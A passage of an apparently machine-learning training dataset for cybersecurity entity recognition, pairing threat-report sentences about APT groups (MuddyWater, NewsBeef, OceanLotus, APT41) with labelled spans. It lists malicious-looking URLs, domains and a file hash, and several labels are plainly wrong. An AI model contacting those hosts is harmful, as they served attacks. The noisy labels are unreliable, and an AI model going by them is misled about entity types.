In addition , by using VBA2Graph , we were able to visualize the VBA call graph in the macros of each document .", "spans": {"MALWARE: backdoor": [[14, 22]], "FILEPATH: VBA2Graph": [[207, 216]]}, "info": {"id": "cyberner_stix_train_001272", "source": "cyberner_stix_train"}} {"text": "Using intelligence from our in-depth investigation , Windows Defender ATP can raise alerts for malicious behavior employed by FinFisher ( such as memory injection in persistence ) in different stages of the attack kill chain . Spring Dragon 's infiltration techniques there were not simply spearphish . After all , it is embedded inside a legitimate executable that still needs to run . In late 2021 and 2022 , Cuba ransomware delivered an increasing number of highprofile attacks .", "spans": {"SYSTEM: Windows Defender ATP": [[53, 73]], "MALWARE: FinFisher": [[126, 135]], "THREAT_ACTOR: Spring Dragon": [[227, 240]]}, "info": {"id": "cyberner_stix_train_001273", "source": "cyberner_stix_train"}} {"text": "How does Gooligan work ? Remexi is a basic back door Trojan that allows attackers to open a remote shell on the computer and execute commands . and has only read accesses . The goal of studying IoAs is to understand the intent of a malicious user accessing the information and network resources of the organization , even when a malicious payload is not yet delivered , and all computing interactions can be considered as legitimate and authorized .", "spans": {"MALWARE: Gooligan": [[9, 17]], "TOOL: Remexi": [[25, 31]], "THREAT_ACTOR: attackers": [[72, 81]], "THREAT_ACTOR: malicious user": [[232, 246]], "MALWARE: malicious payload": [[329, 346]]}, "info": {"id": "cyberner_stix_train_001274", "source": "cyberner_stix_train"}} {"text": "] it server3fi.exodus.connexxa [ . Dragos' data indicates XENOTIME remains active . URL : http://nicoledotson.icu/debby/weatherford/Zavantazhyty . 
Sandworm ’s substation attack reveals notable insights into Russia ’s continued investment in OT - oriented offensive cyber capabilities and overall approach to attacking OT systems .", "spans": {"ORGANIZATION: Dragos'": [[35, 42]], "THREAT_ACTOR: XENOTIME": [[58, 66]], "URL: http://nicoledotson.icu/debby/weatherford/Zavantazhyty": [[90, 144]], "THREAT_ACTOR: Sandworm ’s substation attack": [[147, 176]], "SYSTEM: OT systems": [[318, 328]]}, "info": {"id": "cyberner_stix_train_001275", "source": "cyberner_stix_train"}} {"text": "Additionally , this incident exposes the global nature of cyber threats and the value of worldwide perspective – a cyber espionage incident targeting Russians can provide an opportunity to learn about and interdict crime against English speakers elsewhere . PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat .", "spans": {"THREAT_ACTOR: PLATINUM": [[258, 266]], "ORGANIZATION: specific individuals": [[340, 360]], "VULNERABILITY: zero-day": [[401, 409]]}, "info": {"id": "cyberner_stix_train_001276", "source": "cyberner_stix_train"}} {"text": "HD_Audio.exe : 0c4aa50c95c990d5c5c55345626155b87625986881a2c066ce032af6871c426a connects to manual.newphoneapp.com .", "spans": {"FILEPATH: HD_Audio.exe": [[0, 12]], "FILEPATH: 0c4aa50c95c990d5c5c55345626155b87625986881a2c066ce032af6871c426a": [[15, 79]], "DOMAIN: manual.newphoneapp.com": [[92, 114]]}, "info": {"id": "cyberner_stix_train_001277", "source": "cyberner_stix_train"}} {"text": "It adds the file extension .AnubisCrypt to each encrypted file and sends it to the C2 . Wild Neutron 's attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit . After publishing our initial series of blogposts back in 2016 , we have continued to track the ScarCruft threat actor . 
RussianPanda ( @AnFam17 ) named the URL shortcut campaign RogueRaticate .", "spans": {"THREAT_ACTOR: Wild Neutron": [[88, 100]], "TOOL: stolen code signing certificate": [[127, 158]], "ORGANIZATION: electronics": [[182, 193]], "VULNERABILITY: Flash Player exploit": [[220, 240]], "THREAT_ACTOR: ScarCruft": [[338, 347]], "ORGANIZATION: RussianPanda": [[363, 375]], "MALWARE: RogueRaticate": [[421, 434]]}, "info": {"id": "cyberner_stix_train_001278", "source": "cyberner_stix_train"}} {"text": "To obtain logins and passwords they applied keyloggers built into Corkow , as well as a commonly used feature of Mimikatz , dumping clear text Windows credentials from LSA . Estimating the damages is challenging , but as we learned , the criminals are siphoning off assets in transactions that do not exceed $15,000 each .", "spans": {"TOOL: keyloggers": [[44, 54]], "TOOL: Corkow": [[66, 72]]}, "info": {"id": "cyberner_stix_train_001279", "source": "cyberner_stix_train"}} {"text": "FireEye recently published a blog covering the tactics , techniques , and procedures ( TTPs ) for the “ TRITON actor ” when preparing to deploy the TRITON / TRISIS malware framework in 2017 .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "MALWARE: TRITON": [[104, 110], [148, 154]], "MALWARE: TRISIS": [[157, 163]]}, "info": {"id": "cyberner_stix_train_001280", "source": "cyberner_stix_train"}} {"text": "CLOAKING Client-side Carrier Checks In our basic command & control example above , we didn ’ t address the ( incorrectly labeled ) “ imei ” field . Trojanized versions of the utility were then signed with legitimate certificates and were hosted on and distributed from official ASUS update servers – which made them mostly invisible to the vast majority of protection solutions , according to Kaspersky Lab . Next , the ZxShell Load-Image Notify function prevents the AV processes from restarting . 
The gang attacked 10 victims last month , the majority of them being from the Information and Communications Technology ( ICT ) sectors .", "spans": {"ORGANIZATION: Kaspersky Lab": [[393, 406]], "MALWARE: ZxShell": [[420, 427]], "ORGANIZATION: Information and Communications Technology ( ICT ) sectors": [[577, 634]]}, "info": {"id": "cyberner_stix_train_001281", "source": "cyberner_stix_train"}} {"text": "] 30 . APT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions , including publicly available utilities , malware shared with other Chinese espionage operations , and tools unique to the group . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe \" .", "spans": {"THREAT_ACTOR: APT41": [[7, 12]], "TOOL: malware families": [[55, 71]], "TOOL: tools": [[76, 81]], "THREAT_ACTOR: group": [[235, 240]], "THREAT_ACTOR: APT32": [[253, 258]], "FILEPATH: Vietnam.exe": [[357, 368]]}, "info": {"id": "cyberner_stix_train_001282", "source": "cyberner_stix_train"}} {"text": "This document discusses a recent targeted attack campaign directed primarily at private companies involved in the research , development , and manufacture of chemicals and advanced materials .", "spans": {}, "info": {"id": "cyberner_stix_train_001283", "source": "cyberner_stix_train"}} {"text": "] 23 222.139.212 [ . To maintain presence , APT41 relies on backdoors , a Sticky Keys vulnerability , scheduled tasks , bootkits , rootkits , registry modifications , and creating or modifying startup files . 
This is in stark contrast to some other suspected Russian threat actors ( such as Operation Pawn Storm ) who appear to have increased their targeting of Ukraine following the crisis .", "spans": {"THREAT_ACTOR: APT41": [[44, 49]], "TOOL: Sticky Keys": [[74, 85]], "TOOL: scheduled tasks": [[102, 117]], "TOOL: bootkits": [[120, 128]], "TOOL: rootkits": [[131, 139]], "TOOL: registry modifications": [[142, 164]], "THREAT_ACTOR: actors": [[274, 280]]}, "info": {"id": "cyberner_stix_train_001284", "source": "cyberner_stix_train"}} {"text": "The file system commands underling handlers and IPacket were modified to support more features , so these commands don’t work out of the box and required manual implementation from us .", "spans": {"TOOL: file system": [[4, 15]]}, "info": {"id": "cyberner_stix_train_001285", "source": "cyberner_stix_train"}} {"text": "However , the actual text would often only display a basic welcome message . To enhance the effectiveness of phishing attacks into the organization , Barium will collect additional background informationfrom social media sites . The symbol “ g_bCreateListenSck ” is set to 1 . Of the two file types , the PowerPoint files are more unusual in that they would not show any actual slides when opened , but would still execute the malicious VBA code , a finding consistent with CERT - UA ’s analysis .", "spans": {"THREAT_ACTOR: Barium": [[150, 156]], "ORGANIZATION: social media": [[208, 220]]}, "info": {"id": "cyberner_stix_train_001286", "source": "cyberner_stix_train"}} {"text": "Within weeks of eviction , the threat actors attempt to access their ChinaChopper web shells from previously used IP addresses .", "spans": {"MALWARE: ChinaChopper": [[69, 81]], "TOOL: web shells": [[82, 92]]}, "info": {"id": "cyberner_stix_train_001287", "source": "cyberner_stix_train"}} {"text": "Check if chat apps are running In the above example , the malware is searching for Line , Facebook Messenger and WhatsApp activities . 
We are confident the Callisto Group used this type of access to a target 's email account for the purposes of sending spear phishing to other targets . The RIPTIDE exploit document drops its executable file into the C:\\Documents and Settings\\{user}\\Application Data\\Location folder while the HIGHTIDE exploit document drops its executable file into the C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\ folder . Device Registration APT29 has enrolled a device in MFA to an Azure AD environment following a successful password guessing attack against a dormant account .", "spans": {"SYSTEM: Facebook Messenger": [[90, 108]], "SYSTEM: WhatsApp": [[113, 121]], "MALWARE: RIPTIDE": [[291, 298]], "MALWARE: HIGHTIDE": [[427, 435]], "THREAT_ACTOR: Device Registration APT29": [[551, 576]]}, "info": {"id": "cyberner_stix_train_001288", "source": "cyberner_stix_train"}} {"text": "If not , the response is scrubbed of the strings used to complete the billing fraud . Althoughthe BariumDefendants have relied on differentand distinct infrastructures in an effortto evade detection , Bariumused the same e-mail address (hostay88@gmail.com ) to register malicious domains used in connection with at least two toolsets that Barium has employed to compromise victim computers . In this manner , ZxShell is able to completely hide itself , intercepting the following Kernel API calls : ZwAllocateVirtualMemory , ZwOpenEvent , ZwQueryDirectoryFile , ZwWriteFile , ZwEnumerateKey , and ZwDeviceIoControlFile . 
CADDYWIPER is a disruptive wiper written in C that is focused on making data irrecoverable and causing maximum damage within an environment .", "spans": {"THREAT_ACTOR: Barium": [[339, 345]], "MALWARE: ZxShell": [[409, 416]], "MALWARE: CADDYWIPER": [[621, 631]]}, "info": {"id": "cyberner_stix_train_001289", "source": "cyberner_stix_train"}} {"text": "Once the cookie data is decoded , Suckfly has the network name , hostname , IP address , and the victim 's operating system information .", "spans": {"THREAT_ACTOR: Suckfly": [[34, 41]]}, "info": {"id": "cyberner_stix_train_001290", "source": "cyberner_stix_train"}} {"text": "] ru/4 * * * * * 7 ” , containing a link to download the Trojan . Following these reports , Chronicle researchers doubled down on efforts to try to unravel the various campaigns where Winnti was leveraged . Moreover the new version searches for files generated by previous versions .", "spans": {"ORGANIZATION: Chronicle": [[92, 101]], "THREAT_ACTOR: Winnti": [[184, 190]]}, "info": {"id": "cyberner_stix_train_001291", "source": "cyberner_stix_train"}} {"text": "The cybercriminals behind it kept the same masking and distribution methods , using names and icons imitating those of popular free ad services . We will see more from Zebrocy into 2019 on government and military related organizations . 
Both documents contained email addresses , phone numbers and contacts of members of official organizations such as United Nations , UNICEF , and Embassies linked to North Korea .", "spans": {"THREAT_ACTOR: Zebrocy": [[168, 175]], "ORGANIZATION: government": [[189, 199]], "ORGANIZATION: military": [[204, 212]], "TOOL: email": [[262, 267]], "ORGANIZATION: official organizations": [[321, 343]], "ORGANIZATION: United Nations": [[352, 366]], "ORGANIZATION: UNICEF": [[369, 375]], "ORGANIZATION: Embassies": [[382, 391]]}, "info": {"id": "cyberner_stix_train_001292", "source": "cyberner_stix_train"}} {"text": "The group uses a mix of tools and malware , some developed by the group and others that are more generic tools .", "spans": {}, "info": {"id": "cyberner_stix_train_001293", "source": "cyberner_stix_train"}} {"text": "Here , external APT28 reports on 2017 Darkhotel-style activity in Europe and Dealer ’s Choice spearphishing are of interest .", "spans": {"THREAT_ACTOR: APT28": [[16, 21]]}, "info": {"id": "cyberner_stix_train_001294", "source": "cyberner_stix_train"}} {"text": "It is therefore important to note that , contrary to what might be assumed , we have actually observed a drop instead of an increase in Ukraine related campaigns from the Dukes following the country ’s political crisis .", "spans": {"THREAT_ACTOR: Dukes": [[171, 176]]}, "info": {"id": "cyberner_stix_train_001295", "source": "cyberner_stix_train"}} {"text": "It allocates and fills four chunks of memory inside the service process . Since early 2014 , an attacker group of Iranian origin has been actively targeting persons of interest by means of malware infection , supported by persistent spear phishing campaigns . In this instance , the shellcode is configured to load an encoded backdoor from within the payload . 
OT asset owners leveraging IEC-104 compliant devices should take action to preempt potential in the wild deployment of COSMICENERGY .", "spans": {"THREAT_ACTOR: attacker group": [[96, 110]], "ORGANIZATION: OT asset owners": [[361, 376]], "SYSTEM: IEC-104 compliant devices": [[388, 413]], "MALWARE: COSMICENERGY": [[480, 492]]}, "info": {"id": "cyberner_stix_train_001296", "source": "cyberner_stix_train"}} {"text": "In fact , as a sign of their arsenal ’s breadth , they had already decided to retire one of these malware toolsets as obsolete after developing a replacement for it , seemingly from scratch .", "spans": {}, "info": {"id": "cyberner_stix_train_001297", "source": "cyberner_stix_train"}} {"text": "This exploit file made use of the same shellcode that we have observed Transparent Tribe use across a number of spear phishing incidents . PittyTiger could also use CVE-2014-1761 , which is more recent .", "spans": {"THREAT_ACTOR: PittyTiger": [[139, 149]], "VULNERABILITY: CVE-2014-1761": [[165, 178]]}, "info": {"id": "cyberner_stix_train_001298", "source": "cyberner_stix_train"}} {"text": "The C & C server then responds with a configuration file , containing the personal identification number for the device and some settings — the time interval between contacting the server , the list of modules to be installed and so on . Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks . 
The Helminth executable variant is very similar in functionality to its script-based counterpart , as it also communicates with its C2 server using both HTTP and DNS queries .", "spans": {"VULNERABILITY: Flash Player exploit": [[273, 293]], "VULNERABILITY: CVE-2016-4117": [[296, 309]], "MALWARE: Helminth": [[359, 367]], "TOOL: C2": [[487, 489]], "MALWARE: HTTP": [[508, 512]], "MALWARE: DNS": [[517, 520]]}, "info": {"id": "cyberner_stix_train_001299", "source": "cyberner_stix_train"}} {"text": "These early campaigns were distributed via the Lerspeng downloader while later campaigns occasionally used Pony or Andromeda as intermediate loaders to distribute various instances of Dridex .", "spans": {"MALWARE: Lerspeng": [[47, 55]], "TOOL: downloader": [[56, 66]], "MALWARE: Pony": [[107, 111]], "MALWARE: Andromeda": [[115, 124]], "MALWARE: Dridex": [[184, 190]]}, "info": {"id": "cyberner_stix_train_001300", "source": "cyberner_stix_train"}} {"text": "This can result in brand degradation , loss of individual reputation , or loss of consumer trust . The group uses legitimate administration tools to fly under the radar in their post-exploitation phase , which makes detection of malicious activity , as well as attribution more complicated . Since late 2016 , PwC UK and BAE Systems have been assisting victims of a new cyber espionage campaign conducted by APT10 .", "spans": {"THREAT_ACTOR: group": [[103, 108]], "TOOL: legitimate administration tools": [[114, 145]], "ORGANIZATION: PwC UK": [[310, 316]], "ORGANIZATION: BAE Systems": [[321, 332]], "THREAT_ACTOR: APT10": [[408, 413]]}, "info": {"id": "cyberner_stix_train_001301", "source": "cyberner_stix_train"}} {"text": "INDRIK SPIDER consists of experienced malware developers and operators who have likely been part of the group since the early days of Dridex operations , beginning in June 2014 . 
Thursday 's Flash Player update patched 36 vulnerabilities in total including the zero day CVE-2016-4171 .", "spans": {"THREAT_ACTOR: INDRIK SPIDER": [[0, 13]], "TOOL: Dridex": [[134, 140]], "TOOL: Flash": [[191, 196]], "VULNERABILITY: zero day": [[261, 269]], "VULNERABILITY: CVE-2016-4171": [[270, 283]]}, "info": {"id": "cyberner_stix_train_001302", "source": "cyberner_stix_train"}} {"text": "Kaspersky witnessed the ScarCruft threat actor extensively testing a known public exploit during its preparation for the next campaign . CVE-2018-0798 is an RCE vulnerability , a stack buffer overflow that can be exploited by a threat actor to perform stack corruption . As observed previously with CVE-2017-11882 and CVE-2018-0802 , the weaponizer was used exclusively by Chinese Cyber Espionage actors for approximately one year December 2017 through December 2018 , after which cybercrime actors began to incorporate it in their malicious activity . Upon decrypting and executing , it drops two additional files wsc_proxy.exe” (legitimate Avast executable) and a malicious DLL wsc.dll” in the %TEMP% folder . However , Beginning on 25 June 2019 , we started observing multiple commodity campaigns Mostly dropping AsyncRAT using the updated RTF weaponizer with the same exploit ( CVE-2018-0798 ) . Analysis of the Royal Road weaponizer has resulted in the discovery that multiple Chinese threat groups started utilizing CVE-2018-0798 in their RTF weaponizer . These findings also suggest that the threat groups have robust exploit developing capabilities because CVE-2018-0798 is not widely reported on and it is typically not incorporated into publicly available weaponizers . In addition , a current ANY.RUN playback of our observed Elise infection is also available . 
Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , 'EQNEDT32.exe' , scores high for potentially malicious activity . Most recently though , a new campaign , targeting Belarus , Turkey and Ukraine , has emerged that caught the attention of Check Point researchers . The well-crafted and socially engineered malicious documents then become the first stage of a long and mainly fileless infection chain that eventually delivers POWERSTATS , a signature PowerShell backdoor of this threat group . This powerful backdoor can receive commands from the attackers , enabling it to exfiltrate files from the system it is running on , execute additional scripts , delete files , and more . If the macros in SPK KANUN DEĞİŞİKLİĞİ GİB GÖRÜŞÜ.doc” are enabled , an embedded payload is decoded and saved in the %APPDATA% directory with the name CiscoAny.exe” . INF files have been used in the past by MuddyWater , although they were launched using Advpack.dll and not IEAdvpack.dll . In addition , by using VBA2Graph , we were able to visualize the VBA call graph in the macros of each document . Although it has focused most of its efforts on the Middle East region , the political affiliations , motives and purposes behind MuddyWater’s attacks are not very well- defined , thus earning it its name . In the past , countries such as Saudi Arabia , the UAE and Turkey have been a MuddyWater's main target , but the campaigns have also reached a much wider audience , making their ACT to victims in countries such as Belarus and Ukraine . 
MuddyWater target groups across Middle East and Central Asia , primarily using spear phishing emails with malicious attachments . Most recently MuddyWater were connected to a campaign in March that targeted organizations in Turkey , Pakistan , and Tajikistan . The group has been quite visible since the initial 2017 Malwarebytes report on their elaborate espionage attack against the Saudi Arabian government . Our analysis revealed that they drop a new backdoor , which is written in PowerShell as MuddyWater’s known POWERSTATS backdoor . We assume that RunPow stands for run PowerShell , ” and triggers the PowerShell code embedded inside the .dll file . This backdoor has some features similar to a previously discovered version of the Muddywater backdoor . Based on our analysis , we can confirm that MuddyWater target Turkish government organizations related to the finance and energy sectors . This is yet another similarity with previous MuddyWater campaigns , which were known to have targeted multiple Turkish government entities . The main delivery method of this type of backdoor is spear phishing emails or spam that uses social engineering to manipulate targets into enabling malicious documents . Trend Micro™ Deep Discovery™ provides detection , in-depth analysis , and proactive response to today’s stealthy malware , and targeted attacks in real time . MuddyWater first surfaced in 2017 . First stage infections and graphical decoys have been described by multiple sources , including in our previous research MuddyWater expands operations . MuddyWater compiles various offensive Python scripts . This includes Python scripts . Usually , the Stageless Meterpreter has the Ext_server_stdapi.x64.dll” , Ext_server_extapi.x64.dll” , and Ext_server_espia.x64.dll” extensions . The January 2017 report followed up on other private reports published on the group’s BeEF-related activity in 2015 and 2016 . 
Previous analysis of the NewsBeef APT indicates that the group focuses on Saudi Arabian and Western targets , and lacks advanced offensive technology development capabilities . However , in the summer of 2016 , NewsBeef deployed a new toolset that includes macro-enabled Office documents , PowerSploit , and the Pupy backdoor . The most recent NewsBeef campaign uses this toolset in conjunction with spearphishing emails , links sent over social media/standalone private messaging applications , and watering hole attacks that leverage compromised high-profile websites some belonging to the SA government . The NewsBeef actor deployed a new toolset in a campaign that focused primarily on Saudi Arabian targets . NewsBeef continues to deploy malicious macro-enabled Office documents , poisoned legitimate Flash and Chrome installers , PowerSploit , and Pupy tools . The NewsBeef campaign is divided into two main attack vectors , spearphishing and strategic web compromise watering hole attacks . On December 25 , 2016 , the NewsBeef APT stood up a server to host a new set of Microsoft Office documents (maintaining malicious macros and PowerShell scripts) to support its spear-phishing operations . These compromised servers include Saudi Arabian government servers and other high-value organizational identities relevant to NewsBeef's targets . However , Kaspersky Security Network records also contain links that victims clicked from the Outlook web client outlook.live.com” as well as attachments arriving through the Outlook desktop application . Interestingly , NewsBeef set up its server using the hosting provider Choopa , LLC , US” , the same hosting provider that the group used in attacks over the summer of 2016 . NTG’s IT focus and client list likely aided NewsBeef’s delivery of malicious PowerShell-enabled Office documents and poisoned installers . 
In other schemes , NewsBeef sent macro-enabled Office attachments from spoofed law firm identities or other relevant service providers to targets in SA . The law firm in this scheme is based in the United Kingdom and is the sole location for targets outside of SA for this campaign . Starting in October 2016 , NewsBeef compromised a set of legitimate servers (shown below) , and injected JavaScript to redirect visitors to http://analytics-google.org:69/Check.aspx . For example , on a Saudi government website , the NewsBeef APT delivered packed JavaScript into the bottom of a referenced script that is included in every page served from the site the packed and unpacked JavaScript is shown below . The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx” . A high volume of redirections from the compromised site continues into mid-January 2017 . However , as this recent campaign indicates , the NewsBeef APT appears to have shifted its intrusion toolset aACT from BeEF and towards macro-enabled malicious Office documents , PowerSploit , and Pupy . Despite this shift in toolset , the group still relies on old infrastructure as evidenced by their reuse of servers hosted by the service providers Choopa and Atlantic.net . Its attack activities can be traced back to April 2012 . The OceanLotus reflects a very strong confrontational ability and willing to attack by keep evolving their techniques . These APT attacks and adopting confrontation measures will exist for a long time . OceanLotus’ targets are global . OceanLotus have been actively using since at least early 2018 . OceanLotus malware family samples used no earlier than 2017 . we identified two methods to deliver the KerrDown downloader to targets . 
The link to the final payload of KerrDown was still active during the time of analysis and hence we were able to download a copy which turned out to be a variant of Cobalt Strike Beacon . While investigating KerrDown we found multiple RAR files containing a variant of the malware . Therefore , it is clear that the OceanLotus group works during weekdays and takes a break during the weekends . The group was first revealed and named by SkyEye Team in May 2015 . OceanLotus's targets include China's maritime institutions , maritime construction , scientific research institutes and shipping enterprises .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9], [6547, 6556]], "THREAT_ACTOR: ScarCruft": [[24, 33]], "VULNERABILITY: CVE-2018-0798": [[137, 150], [882, 895], [1022, 1035], [1165, 1178]], "VULNERABILITY: CVE-2017-11882": [[299, 313], [1439, 1453]], "VULNERABILITY: CVE-2018-0802": [[318, 331]], "MALWARE: weaponizer": [[338, 348]], "THREAT_ACTOR: actors": [[397, 403]], "FILEPATH: wsc_proxy.exe”": [[615, 629]], "TOOL: DLL": [[676, 679]], "FILEPATH: wsc.dll”": [[680, 688]], "FILEPATH: AsyncRAT": [[816, 824]], "VULNERABILITY: exploit": [[872, 879], [1125, 1132], [1737, 1744]], "THREAT_ACTOR: threat groups": [[990, 1003], [1099, 1112]], "MALWARE: RTF weaponizer": [[1045, 1059]], "FILEPATH: ANY.RUN": [[1304, 1311]], "FILEPATH: Elise": [[1337, 1342]], "TOOL: Word": [[1396, 1400]], "FILEPATH: 'NavShExt.dll'": [[1520, 1534]], "FILEPATH: iexplore.exe": [[1565, 1577]], "VULNERABILITY: CVE-2017-1182": [[1745, 1758]], "FILEPATH: Microsoft Equation Editor": [[1776, 1801]], "FILEPATH: 'EQNEDT32.exe'": [[1804, 1818]], "ORGANIZATION: Check Point": [[1992, 2003]], "FILEPATH: POWERSTATS": [[2176, 2186]], "FILEPATH: PowerShell backdoor": [[2201, 2220]], "FILEPATH: backdoor": [[2258, 2266], [4353, 4361]], "FILEPATH: SPK KANUN": [[2445, 2454]], "FILEPATH: CiscoAny.exe”": [[2579, 2592]], "MALWARE: INF files": [[2595, 2603]], "THREAT_ACTOR: MuddyWater": [[2634, 2644], [3270, 3280], [3414, 3424], 
[4076, 4086], [4216, 4226], [4641, 4651], [4798, 4808], [4830, 4840]], "MALWARE: Advpack.dll": [[2681, 2692]], "MALWARE: IEAdvpack.dll": [[2701, 2714]], "FILEPATH: VBA2Graph": [[2740, 2749]], "THREAT_ACTOR: MuddyWater’s": [[2958, 2970], [3770, 3782]], "THREAT_ACTOR: MuddyWater's": [[3112, 3124]], "TOOL: emails": [[3364, 3370], [4380, 4386], [5602, 5608]], "TOOL: PowerShell": [[3756, 3766], [3848, 3858], [3880, 3890], [6327, 6337]], "MALWARE: POWERSTATS backdoor": [[3789, 3808]], "FILEPATH: .dll file": [[3916, 3925]], "MALWARE: backdoor": [[3933, 3941]], "THREAT_ACTOR: Muddywater": [[4010, 4020]], "ORGANIZATION: Turkish government organizations": [[4094, 4126]], "ORGANIZATION: finance": [[4142, 4149]], "ORGANIZATION: energy": [[4154, 4160]], "ORGANIZATION: Trend Micro™": [[4482, 4494]], "THREAT_ACTOR: attacks": [[4618, 4625]], "MALWARE: Python": [[4868, 4874]], "MALWARE: scripts": [[4875, 4882]], "TOOL: Python": [[4899, 4905]], "FILEPATH: Stageless Meterpreter": [[4930, 4951]], "FILEPATH: Ext_server_stdapi.x64.dll”": [[4960, 4986]], "FILEPATH: Ext_server_extapi.x64.dll”": [[4989, 5015]], "FILEPATH: Ext_server_espia.x64.dll”": [[5022, 5047]], "THREAT_ACTOR: BeEF-related": [[5147, 5159]], "THREAT_ACTOR: NewsBeef": [[5213, 5221], [5399, 5407], [5532, 5540], [5800, 5808], [5902, 5910], [6059, 6067], [6214, 6222], [6758, 6766], [7074, 7082], [7366, 7374], [7573, 7581], [8126, 8134]], "MALWARE: macro-enabled Office documents": [[5445, 5475]], "MALWARE: PowerSploit": [[5478, 5489], [6024, 6035], [8255, 8266]], "MALWARE: Pupy backdoor": [[5500, 5513]], "MALWARE: Flash": [[5994, 5999]], "MALWARE: Chrome installers": [[6004, 6021]], "MALWARE: Pupy tools": [[6042, 6052]], "ORGANIZATION: Microsoft": [[6266, 6275]], "THREAT_ACTOR: NewsBeef's": [[6516, 6526]], "TOOL: Outlook": [[6631, 6638], [6712, 6719]], "FILEPATH: outlook.live.com”": [[6650, 6667]], "MALWARE: Choopa": [[6812, 6818]], "MALWARE: LLC": [[6821, 6824]], "MALWARE: US”": [[6827, 6830]], "ORGANIZATION: NTG’s": [[6916, 
6921]], "THREAT_ACTOR: NewsBeef’s": [[6960, 6970]], "THREAT_ACTOR: targets": [[7297, 7304]], "MALWARE: JavaScript": [[7729, 7739]], "FILEPATH: JavaScript": [[7761, 7771]], "THREAT_ACTOR: redirections": [[8003, 8015]], "MALWARE: Office documents": [[8236, 8252]], "MALWARE: Pupy": [[8273, 8277]], "THREAT_ACTOR: OceanLotus": [[8515, 8525], [8747, 8757], [8811, 8821], [9263, 9273]], "ORGANIZATION: adopting confrontation measures": [[8653, 8684]], "THREAT_ACTOR: OceanLotus’": [[8714, 8725]], "FILEPATH: KerrDown": [[8914, 8922], [8980, 8988], [9155, 9163]], "THREAT_ACTOR: OceanLotus's": [[9410, 9422]], "ORGANIZATION: maritime institutions": [[9447, 9468]], "ORGANIZATION: maritime construction": [[9471, 9492]], "ORGANIZATION: scientific research institutes": [[9495, 9525]], "ORGANIZATION: shipping enterprises": [[9530, 9550]]}, "info": {"id": "cyberner_stix_train_001303", "source": "cyberner_stix_train"}} {"text": "The G DATA SecurityLabs are convinced that the number of similarities identified between EvilBunny and Babar show that both malware families originate from the same developers . The addition of the EternalBlue exploit to Metasploit has made it easy for threat actors to exploit these vulnerabilities .", "spans": {"ORGANIZATION: G DATA SecurityLabs": [[4, 23]], "TOOL: EvilBunny": [[89, 98]], "TOOL: Babar": [[103, 108]], "VULNERABILITY: EternalBlue": [[198, 209]], "VULNERABILITY: exploit": [[210, 217], [270, 277]], "MALWARE: Metasploit": [[221, 231]], "THREAT_ACTOR: actors": [[260, 266]]}, "info": {"id": "cyberner_stix_train_001304", "source": "cyberner_stix_train"}} {"text": "Once a user downloads a malicious app , it silently registers receivers which establish a connection with the C & C server . The primary goal of these attacks was likely to find code-signing certificates for signing future malware . with the goal of retrieving a new updated list . 
Danbot , Shark , and Milan use both DNS and HTTPS for C2 communications , while Marlin uses the OneDrive API for C2 communications .", "spans": {"MALWARE: Danbot": [[282, 288]], "MALWARE: Shark": [[291, 296]], "MALWARE: Milan": [[303, 308]], "SYSTEM: DNS": [[318, 321]], "SYSTEM: HTTPS": [[326, 331]], "SYSTEM: C2 communications": [[336, 353], [395, 412]], "MALWARE: Marlin": [[362, 368]], "SYSTEM: OneDrive API": [[378, 390]]}, "info": {"id": "cyberner_stix_train_001305", "source": "cyberner_stix_train"}} {"text": "Command to change the beaconing changeArchive : The final command of the activation cycle is the download of an archive . When successfully executed , the malicious documents install a backdoor we track as POWERSTATS . When the DLL is initially loaded , it dynamically resolves and imports additional modules ( DLLs ’ ) needed . The most significant similarities we identified are with INDUSTROYER and INDUSTROYER.V2 , which were both malware variants deployed in the past to impact electricity transmission and distribution .", "spans": {"TOOL: backdoor": [[185, 193]], "TOOL: POWERSTATS": [[206, 216]], "TOOL: DLL": [[228, 231]], "TOOL: DLLs": [[311, 315]], "MALWARE: INDUSTROYER": [[386, 397]], "MALWARE: INDUSTROYER.V2": [[402, 416]]}, "info": {"id": "cyberner_stix_train_001306", "source": "cyberner_stix_train"}} {"text": "Loading the decrypted .dex file into memory and triggering the main payload Main payload When the main payload is loaded into memory , the initial detonator hands over the control to the main payload by invoking the method XoqF ( which we renamed to triggerInfection during analysis ) from the gvmthHtyN class ( renamed to PayloadEntry ) . Coincidentally , following the recent hack of a US Navy contractor and theft of highly sensitive data on submarine warfare , we have found evidence of very recent activity by a group referred to as APT15 , known for committing cyber espionage which is believed to be affiliated with the Chinese government . 
This NanoCore RAT is version 1.2.2.0 which has been found to be offered for free on the Dark Web just a few months . The threat actor targets individuals and employees that may have access to a Facebook Business account with an information - stealer malware .", "spans": {"ORGANIZATION: Navy": [[391, 395]], "THREAT_ACTOR: group": [[517, 522]], "THREAT_ACTOR: APT15": [[538, 543]], "THREAT_ACTOR: cyber espionage": [[567, 582]], "MALWARE: NanoCore": [[653, 661]], "ORGANIZATION: Dark Web": [[736, 744]], "THREAT_ACTOR: threat actor": [[769, 781]], "ORGANIZATION: individuals and employees that may have access to a Facebook Business account": [[790, 867]]}, "info": {"id": "cyberner_stix_train_001307", "source": "cyberner_stix_train"}} {"text": "When reviewing the decrypted packet , it ’ s clear it has the same content as previous versions . INF files have been used in the past by MuddyWater , although they were launched using Advpack.dll and not IEAdvpack.dll . They then proceeded to log directly into the VPN using the credentials of the compromised user .", "spans": {"TOOL: INF files": [[98, 106]], "THREAT_ACTOR: MuddyWater": [[137, 147]], "TOOL: Advpack.dll": [[184, 195]], "TOOL: IEAdvpack.dll": [[204, 217]], "TOOL: VPN": [[265, 268]], "MALWARE: credentials of the 